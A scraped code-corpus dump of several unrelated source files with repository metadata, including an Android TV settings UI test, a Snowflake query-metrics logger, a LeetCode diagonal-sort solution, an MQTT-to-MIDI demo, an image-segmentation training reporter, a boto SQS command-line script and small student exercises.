e200015486e71bc146de42be55e36a0a0cb55b0c | 94a6a83c8bd3f9a951ee7d48973f35d0b5b6f99c | /testcases/dev/GlobalSettings_dev.py | dee52c16156534ae6bd5896371cc00e4e651c91d | [] | no_license | JerryLiu0821/apython | 19766bebd5365e53aa7ea46adc01132045e91f9c | d9804b1099c879da1f8dc130fb205ab191f65fb1 | refs/heads/master | 2020-05-17T05:09:15.319167 | 2015-08-17T10:50:09 | 2015-08-17T10:50:09 | 40,886,032 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,079 | py | # -*- coding: utf-8 -*-
'''
Created on Mar 27, 2013
@author: liujian
'''
import unittest
import re, time, commands, os
import sys
sys.path.append('../testcases')
import Stability
class TestGlobalSettings(unittest.TestCase):
def setUp(self):
try :
self.error = ''
self.setup = Stability.SetupDeviceConnections()
self.a = self.setup.initializeTestDevice()
self.stabdl = Stability.StabDL(self.a)
self.a.input.back(3)
except Exception, e :
self.a.log.debug("", "\n Set up")
def tearDown(self):
self.a.input.back(3)
def test3D(self):
"""打开关闭3D|在设置中打开关闭3D"""
try:
#self.launchLetv()
self.a.input.home()
time.sleep(3)
self.a.input.home()
time.sleep(3)
self.a.input.back()
time.sleep(2)
self.a.device.sh('input keyevent 176')
self.a.input.left(8)
self.a.input.right(2)
self.a.input.center()
w = self.a.ui.screen()
if 'mode_msg' not in str(w.ids()):
self.error = 'cannot open 3d mode in settings'
raise Exception
for i in range(3):
self.a.input.right()
self.a.input.center()
if not self.isOK():
raise Exception
self.a.input.left(3)
self.a.input.center()
except Exception, e :
self.a.log.debug("", "\n test3D")
self.fail("Error happened: %s %s" % ( self.error, e))
def testMiracast(self):
"""Miracast打开关闭|在设置中打开关闭Miracast"""
try:
self.a.device.sh('input keyevent 176')
self.a.input.left(8)
self.a.input.right(4)
time.sleep(2)
self.a.input.center()
w = self.a.ui.screen()
if 'miracast_switch' not in str(w.ids()):
self.error = 'cannot open miracast mode in settings'
raise Exception
self.a.input.down()
for i in range(6):
                if '\u5173\u95ed' in str(w.texts()):  # matches the escaped repr of the Chinese "Off" label
print 'open miracast'
else:
print 'close miracast'
self.a.input.center()
time.sleep(10)
if not self.isOK():
raise Exception
w = self.a.ui.screen()
self.a.input.back()
except Exception, e :
self.a.log.debug("", "\n test3D")
self.fail("Error happened: %s %s" % ( self.error, e))
def _testInstallApks(self):
"""安装外部应用|安装多个外部应用"""
try:
apksp = '../testcases/setup/apks/'
apks = commands.getoutput("ls %s" %apksp).split('\n')
for apk in apks:
os.system("adb -s %s install %s/%s" %(self.id, apksp, apk))
except Exception, e :
self.a.log.debug("", "\n testInstallApks")
self.fail("Error happened: %s %s" % ( self.error, e))
def launchLetv(self):
for i in range(3):
self.a.input.home()
time.sleep(5)
self.a.input.back(2)
time.sleep(2)
for i in range(5):
if 'com.letv.signalsourcemanager/com.letv.signalsourcemanager.MainActivity' not in str(self.a.ui.window()):
self.a.input.home()
time.sleep(2)
self.a.input.left()
time.sleep(1)
self.a.input.center()
else:
break
self.a.input.home()
time.sleep(2)
self.a.input.right(2)
self.a.input.center()
def isOK(self):
try:
widgets = self.a.ui.waitfor(
anyof=[
self.a.ui.widgetspec(id='message'),
self.a.ui.widgetspec(text='Wait')])
if widgets == 'message':
self.a.input.down()
self.a.input.center()
self.error = "Force Closed"
return False
if widgets == 'Wait':
self.a.input.down()
self.a.input.right()
self.a.input.center()
self.error = "ANR Happened"
return False
"""if widgets == idname:
self.error="Exit Without any prompt message"
return False"""
self.a.log.debug("", "No Force Closed & ANR happen!")
if 'Application Error' in str(self.a.ui.windows()):
self.a.input.right()
self.a.input.center()
return False
return True
except:
return True
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| [
"[email protected]"
] | |
68fbfc30ae113b14e8e307ec4775137c6e47de5d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/97/usersdata/206/56394/submittedfiles/lecker.py | 6a4f92871ebc5f5c9f874df4bd40bc0b6ea4393a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | # -*- coding: utf-8 -*-
n = int(input('Enter N: '))
a=[]
b=[]
contA=0
contB=0
for z in range (1, n+1,1):
    valorA = float(input('Value for list A: '))
a.append(valorA)
for i in range (0, len(a),1):
if(i==0):
       if (a[i]>a[i+1]):
contA=contA + 1
elif (i==len(a)- 1):
if (a[i]>a[i-1]):
contA=contA + 1
else:
if(a[i]>a[i+1] and a[i]>a[i-1]):
contA=contA + 1
for z in range (1, n+1, 1):
    valorB = float(input('Value for list B: '))
b.append(valorB)
for i in range (0, len(b), 1):
if(i==0):
    if (b[i]>b[i+1]):
contB=contB+1
elif(i==len(b)-1):
if(b[i]>b[i-1]):
contB=contB+1
else:
    if(b[i]>b[i+1] and b[i]>b[i-1]):
contB=contB+1
if(contA==1):
print('S')
else:
    print('N')
if(contB==1):
print('S')
else:
print('N')
| [
"[email protected]"
] | |
726e3445787acda675e18981a98aa2e53e15c3ab | 8de847f626ffb6b11e49bec669cb80304a66a0af | /plugins/dbnd-snowflake/src/dbnd_snowflake/snowflake_resources.py | 0a37250ef330c5add20ed3cf14ca8b0387d6b7b7 | [
"Apache-2.0"
] | permissive | FHoffmannCode/dbnd | 5ac7d766ec1bfe37f7a12605ebd12b4dcf31fba6 | 82beee1a8c752235bf21b4b0ceace5ab25410e52 | refs/heads/master | 2022-12-26T06:04:30.008949 | 2020-10-04T19:30:58 | 2020-10-04T19:30:58 | 301,370,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,981 | py | import logging
from decimal import Decimal
from textwrap import dedent
from dbnd import log_duration, log_metrics
from dbnd_snowflake.snowflake_values import SnowflakeController
logger = logging.getLogger(__name__)
# TODO: Add support for QUERY_TAG
# I.e. Subclass SnowflakeOperator and set session param QUERY_TAG to "dbnd.{dag/task_name/task_id}"
# Then use pass this QUERY_TAG to UI for easier navigation between
# See https://community.snowflake.com/s/article/How-We-Controlled-and-Reduced-Snowflake-Compute-Cost
# https://github.com/snowflakedb/snowflake-connector-python/issues/203
def log_snowflake_resource_usage(
query_text, database, user, connection_string, session_id=None
):
"""
get and log cpu time, run time, disk read, and processed rows.
connection or connection_string is required. supports only psycopg2 connections.
"""
try:
with log_duration("log_snowflake_resource_usage__time_seconds", "system"):
_log_snowflake_resource_usage(
query_text, database, user, connection_string, session_id
)
except Exception as exc:
conn_without_pass = _censor_password(connection_string)
logger.exception(
"Failed to log_redshift_resource_usage (query_text=%s, connection_string=%s)",
query_text,
conn_without_pass,
)
def _log_snowflake_resource_usage(
query_text, database, user, connection_string, session_id=None,
):
# Quick and dirty way to handle optional clause element.
# Might be better to use SQLAlchemy expression language here
if session_id:
query_history = dedent(
"""\
select *
from table({}.information_schema.query_history(dateadd('minutes',-15,current_timestamp()),current_timestamp()))
where LOWER(query_text)=LOWER(%s) and LOWER(user_name)=LOWER(%s) and session_id=%s
order by start_time desc limit 1;"""
).format(database, session_id)
query_params = (query_text, user, session_id)
else:
query_history = dedent(
"""\
select *
from table({}.information_schema.query_history(dateadd('minutes',-15,current_timestamp()),current_timestamp()))
where LOWER(query_text)=LOWER(%s) and LOWER(user_name)=LOWER(%s)
order by start_time desc limit 1;"""
).format(database)
query_params = (query_text, user)
result = _connect_and_query(connection_string, query_history, *query_params)
if not result:
logger.info(
"resource metrics were not found for query '%s', query_params=%s",
query_text,
query_params,
)
log_metrics(
{
"snowflake_query_warning": "No resources info found",
"snowflake_query_text": query_text,
},
source="system",
)
return
metrics = result[0]
key = "snowflake_query_{}".format(
metrics["QUERY_TAG"] if metrics["QUERY_TAG"] else metrics["QUERY_ID"]
)
snowflake_metric_to_ui_name = {
"BYTES_SCANNED": "bytes_scanned",
"COMPILATION_TIME": "compilation_time_milliseconds",
"CREDITS_USED_CLOUD_SERVICES": "credits_used_cloud_services",
"EXECUTION_TIME": "execution_time_milliseconds",
"QUERY_TEXT": "query_text",
"ROWS_PRODUCED": "rows_produced",
"TOTAL_ELAPSED_TIME": "total_elapsed_time_milliseconds",
}
metrics_to_log = {}
for metric, ui_name in snowflake_metric_to_ui_name.items():
if metric in metrics:
value = metrics[metric]
# Quick hack to track decimal values. probably should be handled on a serialization level
if isinstance(value, Decimal):
value = float(value)
metrics_to_log[key + "." + ui_name] = value
log_metrics(metrics_to_log, source="system")
def _connect_and_query(connection_string, query, *params):
""" connect if needed, then query. """
# if (connection is None) and (connection_string is None):
if connection_string is None:
logger.error(
"connection and connection string are None, one of them is required to query redshift"
)
return
with SnowflakeController(connection_string) as snowflake:
return snowflake._query(query, params)
def _censor_password(connection_string):
"""
    example connection string:
        snowflake://user:[email protected]/dev
    returns:
        snowflake://user:*****@account.snowflakecomputing.com/dev
"""
if (not connection_string) or ("@" not in connection_string):
return connection_string
split1 = connection_string.split("@")
split2 = split1[0].split(":")
if len(split2) != 3:
return connection_string
split2[-1] = "*****"
split2_join = ":".join(split2)
split1[0] = split2_join
split1_join = "@".join(split1)
return split1_join
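
# Minimal usage sketch (illustrative only, not part of the module's public
# contract): the connection string is a placeholder, and QUERY_HISTORY only
# returns rows for statements that actually ran in the last 15 minutes.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    log_snowflake_resource_usage(
        query_text="select 1",          # must match an executed statement
        database="analytics",           # hypothetical database
        user="etl_user",                # hypothetical user
        connection_string="snowflake://etl_user:secret@my_account/analytics",
    )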
| [
"[email protected]"
] | |
0b2ee115102da0dff844ffdbfff0f1445e2b6017 | 66fe6eb64afeb7313a4c7685a8748455325b6726 | /1329-sort-the-matrix-diagonally.py | b944795e759d4d78649c943f42f1017f27392e8e | [] | no_license | anantkaushik/leetcode | b54eb27b17ed95b02ab426392208c346f2d87aaa | 06f0a6dbff2e2062fa4568efa5f01ad982d6ac94 | refs/heads/master | 2022-03-07T18:21:35.881943 | 2022-02-23T12:27:24 | 2022-02-23T12:27:24 | 120,501,367 | 40 | 13 | null | 2019-10-11T11:07:22 | 2018-02-06T18:05:51 | Python | UTF-8 | Python | false | false | 1,243 | py | """
Problem Link: https://leetcode.com/problems/sort-the-matrix-diagonally/
A matrix diagonal is a diagonal line of cells starting from some cell in either the topmost row or leftmost column and
going in the bottom-right direction until reaching the matrix's end. For example, the matrix diagonal starting from mat[2][0],
where mat is a 6 x 3 matrix, includes cells mat[2][0], mat[3][1], and mat[4][2].
Given an m x n matrix mat of integers, sort each matrix diagonal in ascending order and return the resulting matrix.
Example 1:
Input: mat = [[3,3,1,1],[2,2,1,2],[1,1,1,2]]
Output: [[1,1,1,1],[1,2,2,2],[1,2,3,3]]
Constraints:
m == mat.length
n == mat[i].length
1 <= m, n <= 100
1 <= mat[i][j] <= 100
"""
import collections
from typing import List


class Solution:
def diagonalSort(self, mat: List[List[int]]) -> List[List[int]]:
diagnoals = collections.defaultdict(list)
for i, row in enumerate(mat):
for j, val in enumerate(row):
diagnoals[i-j].append(val)
for d in diagnoals.values():
d.sort(reverse=True)
for i, row in enumerate(mat):
for j, _ in enumerate(row):
mat[i][j] = diagnoals[i-j].pop()
return mat
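
# Quick sanity check using Example 1 from the problem statement (guarded so
# that importing the file stays side-effect free):
if __name__ == "__main__":
    matrix = [[3, 3, 1, 1], [2, 2, 1, 2], [1, 1, 1, 2]]
    print(Solution().diagonalSort(matrix))
    # expected: [[1, 1, 1, 1], [1, 2, 2, 2], [1, 2, 3, 3]]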
| [
"[email protected]"
] | |
d68c5d463664d4d7bdbf0dbcda90e172df77d16f | 40218b64840f4eec1866e33300a8395bdfa4c33b | /demos/TestMQTTMusic.py | 456f3f1fd42dc664ca03a96ca51e57e63ea91846 | [
"MIT"
] | permissive | titos-carrasco/MindSet-Python | af0750ec12a72954741f13ff016e9a4d9e753b08 | 74f53fe49b8b6129a7a34da314efc46d3d5e1aa1 | refs/heads/master | 2021-12-24T16:41:43.766347 | 2021-12-24T00:02:34 | 2021-12-24T00:02:34 | 98,101,141 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,000 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import rtmidi
import paho.mqtt.client as mqtt
import json
import time
import queue
from mindset.MindSet import *
MQTT_SERVER = '127.0.0.1'
MQTT_PORT = 1883
MQTT_TOPIC = "rcr/demo/mindset"
class TestMusicaMQTT():
def __init__( self, mqtt_server, mqtt_port, mqtt_topic ):
self.mqtt_server = mqtt_server
self.mqtt_port = mqtt_port
self.mqtt_topic = mqtt_topic
self.messages = queue.Queue( 1 )
def mqtt_on_connect( self, client, userdata, flags, rc ):
client.subscribe( self.mqtt_topic )
def mqtt_on_message( self, client, userdata, message ):
try:
self.messages.get_nowait()
except:
pass
self.messages.put_nowait( message )
def run( self ):
midiOut = rtmidi.MidiOut()
midiOut.open_virtual_port( 'MindSet Port' )
nota1 = [ 0 ]*4
nota2 = [ 0 ]*4
mqtt_client = mqtt.Client()
mqtt_client.on_connect = self.mqtt_on_connect
mqtt_client.on_message = self.mqtt_on_message
mqtt_client.loop_start()
mqtt_client.connect( self.mqtt_server, self.mqtt_port )
time.sleep( 2 )
while( True ):
msg = self.messages.get()
msd = json.loads( msg.payload )
            nota = msd['attentionESense']
            midiOut.send_message( [ 0x90, nota, 8 ] )    # note-on, channel 0: note, velocity
            nota1.append( nota )
            nota = nota1.pop(0)
            midiOut.send_message( [ 0x80, nota, 8 ] )    # note-off, channel 0: note, velocity
            nota = msd['meditationESense']
            midiOut.send_message( [ 0x91, nota, 8 ] )    # note-on, channel 1: note, velocity
            nota2.append( nota )
            nota = nota2.pop(0)
            midiOut.send_message( [ 0x81, nota, 8 ] )    # note-off, channel 1: note, velocity
if( __name__ == "__main__" ):
TestMusicaMQTT( MQTT_SERVER, MQTT_PORT, MQTT_TOPIC ).run()
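
# Example of the JSON payload this demo expects on MQTT_TOPIC (the field names
# are the ones read in run(); the values are illustrative):
#
#   {"attentionESense": 54, "meditationESense": 61}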
| [
"[email protected]"
] | |
f273efbb20a2ff8023b3515a70d85b4edd43fe4e | b60953cdbb29dd87a450d1a1a5f6f5fde6f0e200 | /util/repoter.py | 42db8e3d10e2dbca45c5ed3d6cd6ac2e0cfe670f | [
"MIT"
] | permissive | PINTO0309/TensorflowLite-UNet | bcffad7db93c8ea0d85aea976773fa22fa8bd2bb | e805162fc2623b31dbdbf159d2eb89d7041fdbdd | refs/heads/master | 2020-04-01T20:56:13.269870 | 2019-02-13T11:59:01 | 2019-02-13T11:59:01 | 153,627,668 | 79 | 22 | MIT | 2018-10-19T23:13:56 | 2018-10-18T13:24:10 | Python | UTF-8 | Python | false | false | 6,381 | py | from PIL import Image
import numpy as np
import datetime
import os
import matplotlib.pyplot as plt
class Reporter:
ROOT_DIR = "result"
IMAGE_DIR = "image"
LEARNING_DIR = "learning"
INFO_DIR = "info"
PARAMETER = "parameter.txt"
IMAGE_PREFIX = "epoch_"
IMAGE_EXTENSION = ".png"
def __init__(self, result_dir=None, parser=None):
if result_dir is None:
result_dir = Reporter.generate_dir_name()
self._root_dir = self.ROOT_DIR
self._result_dir = os.path.join(self._root_dir, result_dir)
self._image_dir = os.path.join(self._result_dir, self.IMAGE_DIR)
self._image_train_dir = os.path.join(self._image_dir, "train")
self._image_test_dir = os.path.join(self._image_dir, "test")
self._learning_dir = os.path.join(self._result_dir, self.LEARNING_DIR)
self._info_dir = os.path.join(self._result_dir, self.INFO_DIR)
self._parameter = os.path.join(self._info_dir, self.PARAMETER)
self.create_dirs()
self._matplot_manager = MatPlotManager(self._learning_dir)
if parser is not None:
self.save_params(self._parameter, parser)
@staticmethod
def generate_dir_name():
return datetime.datetime.today().strftime("%Y%m%d_%H%M")
def create_dirs(self):
os.makedirs(self._root_dir, exist_ok=True)
os.makedirs(self._result_dir)
os.makedirs(self._image_dir)
os.makedirs(self._image_train_dir)
os.makedirs(self._image_test_dir)
os.makedirs(self._learning_dir)
os.makedirs(self._info_dir)
@staticmethod
def save_params(filename, parser):
parameters = list()
parameters.append("Number of epochs:" + str(parser.epoch))
parameters.append("Batch size:" + str(parser.batchsize))
parameters.append("Training rate:" + str(parser.trainrate))
parameters.append("Augmentation:" + str(parser.augmentation))
parameters.append("L2 regularization:" + str(parser.l2reg))
output = "\n".join(parameters)
with open(filename, mode='w') as f:
f.write(output)
def save_image(self, train, test, epoch):
file_name = self.IMAGE_PREFIX + str(epoch) + self.IMAGE_EXTENSION
train_filename = os.path.join(self._image_train_dir, file_name)
test_filename = os.path.join(self._image_test_dir, file_name)
train.save(train_filename)
test.save(test_filename)
def save_image_from_ndarray(self, train_set, test_set, palette, epoch, index_void=None):
assert len(train_set) == len(test_set) == 3
train_image = Reporter.get_imageset(train_set[0], train_set[1], train_set[2], palette, index_void)
test_image = Reporter.get_imageset(test_set[0], test_set[1], test_set[2], palette, index_void)
self.save_image(train_image, test_image, epoch)
def create_figure(self, title, xylabels, labels, filename=None):
return self._matplot_manager.add_figure(title, xylabels, labels, filename=filename)
@staticmethod
def concat_images(im1, im2, palette, mode):
if mode == "P":
assert palette is not None
dst = Image.new("P", (im1.width + im2.width, im1.height))
dst.paste(im1, (0, 0))
dst.paste(im2, (im1.width, 0))
dst.putpalette(palette)
elif mode == "RGB":
dst = Image.new("RGB", (im1.width + im2.width, im1.height))
dst.paste(im1, (0, 0))
dst.paste(im2, (im1.width, 0))
return dst
@staticmethod
def cast_to_pil(ndarray, palette, index_void=None):
assert len(ndarray.shape) == 3
res = np.argmax(ndarray, axis=2)
if index_void is not None:
res = np.where(res == index_void, 0, res)
image = Image.fromarray(np.uint8(res), mode="P")
image.putpalette(palette)
return image
@staticmethod
def get_imageset(image_in_np, image_out_np, image_tc_np, palette, index_void=None):
assert image_in_np.shape[:2] == image_out_np.shape[:2] == image_tc_np.shape[:2]
image_out, image_tc = Reporter.cast_to_pil(image_out_np, palette, index_void),\
Reporter.cast_to_pil(image_tc_np, palette, index_void)
image_concated = Reporter.concat_images(image_out, image_tc, palette, "P").convert("RGB")
image_in_pil = Image.fromarray(np.uint8(image_in_np * 255), mode="RGB")
image_result = Reporter.concat_images(image_in_pil, image_concated, None, "RGB")
return image_result
class MatPlotManager:
def __init__(self, root_dir):
self._root_dir = root_dir
self._figures = {}
def add_figure(self, title, xylabels, labels, filename=None):
assert not(title in self._figures.keys()), "This title already exists."
self._figures[title] = MatPlot(title, xylabels, labels, self._root_dir, filename=filename)
return self._figures[title]
def get_figure(self, title):
return self._figures[title]
class MatPlot:
EXTENSION = ".png"
def __init__(self, title, xylabels, labels, root_dir, filename=None):
assert len(labels) > 0 and len(xylabels) == 2
if filename is None:
self._filename = title
else:
self._filename = filename
self._title = title
self._xlabel, self._ylabel = xylabels[0], xylabels[1]
self._labels = labels
self._root_dir = root_dir
self._series = np.zeros((len(labels), 0))
def add(self, series, is_update=False):
series = np.asarray(series).reshape((len(series), 1))
assert series.shape[0] == self._series.shape[0], "series must have same length."
self._series = np.concatenate([self._series, series], axis=1)
if is_update:
self.save()
def save(self):
plt.cla()
for s, l in zip(self._series, self._labels):
plt.plot(s, label=l)
plt.legend()
plt.grid()
plt.xlabel(self._xlabel)
plt.ylabel(self._ylabel)
plt.title(self._title)
plt.savefig(os.path.join(self._root_dir, self._filename+self.EXTENSION))
if __name__ == "__main__":
pass
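
# Hedged usage sketch (not from the original project; `args` stands for an
# argparse-style namespace carrying epoch/batchsize/trainrate/augmentation/l2reg,
# and the arrays are whatever the training loop produces):
#
#   reporter = Reporter(parser=args)
#   fig = reporter.create_figure("Loss", ("epoch", "loss"), ["train", "test"])
#   fig.add([train_loss, test_loss], is_update=True)
#   # each *_set is (input_image, network_output, teacher) as ndarrays
#   reporter.save_image_from_ndarray(train_set, test_set, palette, epoch)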
| [
"[email protected]"
] | |
4a00024163d840eac6bbf878d2c02d6e3dee4993 | fa4d4455159ad2d9e7e057388e2fa45a2333928b | /assignments/Assignment7/Assignment7_3.py | fcf9a62a0d9f5d7b2cb6ab5674836ab5dcbb5aa2 | [] | no_license | shreyash05/python_programs | b492e6fbeba7bc8a31caf72dd60f3984ff16e6f0 | 74b4f3ee15a7221d03816f7ba831d59bec7bf7ff | refs/heads/main | 2023-04-25T11:15:44.868634 | 2021-05-20T12:55:54 | 2021-05-20T12:55:54 | 356,513,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,921 | py | """ 3. Write a program which contains one class named as Numbers.
Arithmetic class contains one instance variables as Value.
Inside init method initialise that instance variables to the value which is accepted from user.
There are four instance methods inside class as ChkPrime(), ChkPerfect(), SumFactors(),
Factors().
ChkPrime() method will returns true if number is prime otherwise return false.
ChkPerfect() method will returns true if number is perfect otherwise return false.
Factors() method will display all factors of instance variable.
SumFactors() method will return addition of all factors. Use this method in any another method
as a helper method if required.
After designing the above class call all instance methods by creating multiple objects. """
class Numbers:
def __init__(self,value):
self.value = value
def ChkPrime(self):
        flag = 0
        for element in range(2,self.value):
if(self.value%element==0):
flag = 1
break
if flag == 0:
return True
else:
return False
def ChkPerfect(self):
isum = 0
for element in range(1,self.value):
if(self.value%element==0):
isum = isum+element
if isum==self.value:
return True
else:
return False
def Factors(self):
print("Factors of number:")
for element in range(1,self.value):
if(self.value%element==0):
print(element)
def SumFactors(self):
isum = 0
for element in range(1,self.value):
if(self.value%element==0):
isum = isum+element
return isum
def main():
obj = Numbers(6)
ret1 = obj.ChkPrime()
if(ret1==True):
print("Number is prime")
else:
print("Number is not prime")
ret2 = obj.ChkPerfect()
if(ret2==True):
print("Number is perfect")
else:
print("Number is not perfect")
obj.Factors()
ret4 = obj.SumFactors()
print("sum of factors is:",ret4)
if __name__ == '__main__':
main() | [
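
# The spec above asks for multiple objects; a second hypothetical instance
# could exercise the same methods, e.g.:
#
#   obj2 = Numbers(28)          # 28 is perfect: 1+2+4+7+14 == 28
#   print(obj2.ChkPerfect())    # True
#   print(obj2.ChkPrime())      # False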
"[email protected]"
] | |
d5d6cc1460ec8a0cc8fa4caad9843cc19a94fca7 | 7b0c90185aa3d4ae7c422ff32fcc0ebf930f1eed | /venv/bin/cq | 181b875f537d28fd7dc87e8b9dd64210bb35b2fc | [] | no_license | skilllauncher/lets-hi5 | d3c83052886027575e5e3b5d4e92cb934105fab5 | 8277d3ea641b44fc70c4bfb1f5581e6ae8e395cb | refs/heads/master | 2020-03-24T03:14:35.276636 | 2018-07-26T08:14:19 | 2018-07-26T08:14:19 | 142,410,670 | 0 | 1 | null | 2018-07-26T08:16:33 | 2018-07-26T08:16:33 | null | UTF-8 | Python | false | false | 3,089 | #!/Users/saicharanreddy/Desktop/lets-hi5/venv/bin/python
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import getopt, sys
import boto.sqs
from boto.sqs.connection import SQSConnection
from boto.exception import SQSError
def usage():
print 'cq [-c] [-q queue_name] [-o output_file] [-t timeout] [-r region]'
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], 'hcq:o:t:r:',
['help', 'clear', 'queue=',
'output=', 'timeout=', 'region='])
except:
usage()
sys.exit(2)
queue_name = ''
output_file = ''
timeout = 30
region = ''
clear = False
for o, a in opts:
if o in ('-h', '--help'):
usage()
sys.exit()
if o in ('-q', '--queue'):
queue_name = a
if o in ('-o', '--output'):
output_file = a
if o in ('-c', '--clear'):
clear = True
if o in ('-t', '--timeout'):
timeout = int(a)
if o in ('-r', '--region'):
region = a
if region:
c = boto.sqs.connect_to_region(region)
if c is None:
print 'Invalid region (%s)' % region
sys.exit(1)
else:
c = SQSConnection()
if queue_name:
try:
rs = [c.create_queue(queue_name)]
except SQSError as e:
print 'An Error Occurred:'
print '%s: %s' % (e.status, e.reason)
print e.body
sys.exit()
else:
try:
rs = c.get_all_queues()
except SQSError as e:
print 'An Error Occurred:'
print '%s: %s' % (e.status, e.reason)
print e.body
sys.exit()
for q in rs:
if clear:
n = q.clear()
print 'clearing %d messages from %s' % (n, q.id)
elif output_file:
q.dump(output_file)
else:
print q.id, q.count(vtimeout=timeout)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | ||
50b15ee80d619c141365229c4ac4c5a1f3eab92a | 74f2e26b17acd51f5eaea5df6a3921943ac29d98 | /pints/tests/test_toy_lotka_volterra_model.py | 64e450b7bfbab3ec9d4558042baa600896f97152 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | nandigama/pints | fd1ec6ee7e7a0d5f255f6c94b0da0a3cbb2e9efd | adf920adaf4f9e23f33bb978f79bc0c341acd4eb | refs/heads/master | 2020-07-13T03:13:33.740363 | 2019-08-26T21:15:24 | 2019-08-26T21:15:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,466 | py | #!/usr/bin/env python
#
# Tests if the Lotka-Volterra toy model runs.
#
# This file is part of PINTS.
# Copyright (c) 2017-2018, University of Oxford.
# For licensing information, see the LICENSE file distributed with the PINTS
# software package.
#
import unittest
import numpy as np
import pints
import pints.toy
class TestLotkaVolterraModel(unittest.TestCase):
"""
Tests if the Lotka-Volterra toy model runs.
"""
def test_run(self):
model = pints.toy.LotkaVolterraModel()
self.assertEqual(model.n_parameters(), 4)
self.assertEqual(model.n_outputs(), 2)
times = model.suggested_times()
parameters = model.suggested_parameters()
values = model.simulate(parameters, times)
self.assertEqual(values.shape, (len(times), 2))
self.assertTrue(np.all(values > 0))
# Test setting and getting init cond.
self.assertFalse(np.all(model.initial_conditions() == [10, 10]))
model.set_initial_conditions([10, 10])
self.assertTrue(np.all(model.initial_conditions() == [10, 10]))
# Initial conditions cannot be negative
model = pints.toy.LotkaVolterraModel([0, 0])
self.assertRaises(ValueError, pints.toy.LotkaVolterraModel, [-1, 0])
self.assertRaises(ValueError, pints.toy.LotkaVolterraModel, [0, -1])
self.assertRaises(ValueError, pints.toy.LotkaVolterraModel, [-1, -1])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
3272b803a4924a147960a0c97b018b92231252ef | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /YK9PpDRfyBTEarNyR_6.py | 336c15964672eb1a583700bbf580e7666e0021f2 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | """
Programmer Pete is trying to turn two lists inside one list into one without
messing the order of the list nor the type and because he's pretty advanced he
made it without blinking but I want you to make it too.
### Examples
one_list([[1, 2], [3, 4]]) ➞ [1, 2, 3, 4]
one_list([["a", "b"], ["c", "d"]]) ➞ ["a", "b", "c", "d"]
one_list([[True, False], [False, False]]) ➞ [True, False, False, False]
### Notes
* Remember to `return` the list.
* Check **Resources** for more info.
"""
def one_list(lst):
return lst[0] + lst[1]
| [
"[email protected]"
] | |
d1cf241890c289ab4628ed9941032718dd9d5a40 | 7ba4e38e0835cd009a078ce39a480b5bacaba21f | /sample_code/chap5/5.1.2.testplot3d.py | d0c8015f395f6ef3c7c84022b96a7c47a74a2256 | [] | no_license | moguranran/computer_vision_test | fe0641987905755c733e4ab16f48c3b76d01b3f4 | 4c5b5572d01e13a42eefb2423e66e34675c305cb | refs/heads/master | 2022-04-20T17:53:37.668609 | 2020-03-31T00:13:02 | 2020-03-31T00:13:02 | 249,196,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from pylab import *
from mpl_toolkits.mplot3d import axes3d
fig = figure()
ax = fig.gca(projection="3d")
# 3Dのサンプルデータを生成する
X,Y,Z = axes3d.get_test_data(0.25)
# 3Dの点を描画する
ax.plot(X.flatten(),Y.flatten(),Z.flatten(),'o')
show()
| [
"[email protected]"
] | |
df09e465e9af07a47772e5ceb87409c30f72a830 | f38e78214992de722a6ec2012e844bce7b3c59ed | /lib/clckwrkbdgr/todo/test/test_providers.py | 04ed6438c490083c1709000f37ae9b135d01877e | [
"MIT"
] | permissive | clckwrkbdgr/dotfiles | 20fb86f54d93ae4936c334898c3d7b1b3820fb06 | a7e880e189bfa4793f30ff928b049e4a182a38cd | refs/heads/master | 2023-08-31T13:13:47.533868 | 2023-08-30T18:32:00 | 2023-08-30T18:32:00 | 20,396,084 | 2 | 2 | MIT | 2022-10-01T16:35:31 | 2014-06-02T07:26:38 | Python | UTF-8 | Python | false | false | 1,153 | py | import json
from ... import xdg
from ... import unittest
